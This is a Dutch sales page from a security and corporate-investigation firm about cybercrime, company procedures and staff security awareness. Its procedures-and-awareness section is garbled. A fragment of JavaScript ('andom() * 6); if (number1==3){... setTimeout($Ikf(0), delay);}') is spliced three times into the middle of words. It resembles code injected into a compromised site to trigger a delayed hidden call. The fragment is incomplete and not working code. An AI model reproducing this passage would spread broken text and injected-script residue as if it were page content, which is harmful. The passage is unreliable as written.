Bedrijfsrecherche

Wat is het u waard?

Veiligheid is een groot goed. Evenals continuïteit. Als ondernemers moeten we er niet aan denken dat het bedrijf “stil” valt. Dat de stroom langere tijd wegvalt zonder noodstroom. Dat het IT-netwerk “plat” ligt. Dat de back-up toch minder up-to-date is dan u veronderstelde. En dan een computer-hack. De gegevens van uw klanten liggen op plaatsen waar ze niet horen, uw bedrijf staat in de krant, een boete dreigt. Al met al klinkt het als rampspoed. Voor velen van ons “ver van ons bed” maar niet ondenkbaar.

Cybercrime

De media kopte recent dat het MKB nadrukkelijk achter loopt in daadwerkelijke maatregelen tegen cybercrime. Niet alleen de technische bescherming vraagt meer inzet, vooral het bewustzijn van directie en medewerkers laat te wensen over met alle gevolgen van dien. Het lijkt zo logisch dat we ons wachtwoord regelmatig aanpassen naar de vereisten van deze tijd maar de geboortedatum als wachtwoord die we vervolgens, in de vakantie, aan een collega geven is geen uitzondering. Dit is 1 voorbeeld, heeft u even? Dan leggen wij het u uit.

Procedures en bewustzijn

Correct Recherchediensten verleent diensten na een incident of tijdens een gebeurtenis. Daar zijn wij goed in. Wij werken aan een oplossing voor onze klant, adviseren waar nodig qua vervolgmaatregelen, zowel technisch, organisatorisch als juridisch. Daarbij verliezen wij niet uit het oog dat het gebeurde incident een gedeeltelijke oplossing van het probleem is. Neemt uw medewerker spullen mee van uw bedrijf? Dan zijn de procedures van uw bedrijf onvoldoende waterdicht. Begrijpt u? De collega in kwestie heeft een probleem, maar uw procedures moeten naar een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander niveau. En na het aanscherpen daarvan volgt het bewustzijn van uw mensen. Zij moeten het belang weten van die procedures en daarnaar handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelen.

Bewustzijn, daar gaat het over. In alle facetten van de veiligheid geldt de mens als de schakel waar het om draait. Daar moet het bewustzijn optimaal zijn. Wij trainen uw mensen in diverse vormen. Wij helpen u als ondernemer om het bewustzijn van uw medewerkers naar een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander niveau te tillen. Zodat u weet dat u er veel aan doet om de continuïteit van uw bedrijf te borgen.

Graag zijn wij u van dienst. Belt u ons wanneer twijfels of vragen leven. Wij staan u graag te woord zonder verplichtingen en/of kosten. Omdat uw continuïteit voor ons belangrijk is.

Rijk Verweij
Correct Beveiliging

Tel. 0416 691 491
r.verweij@correct-groep.nl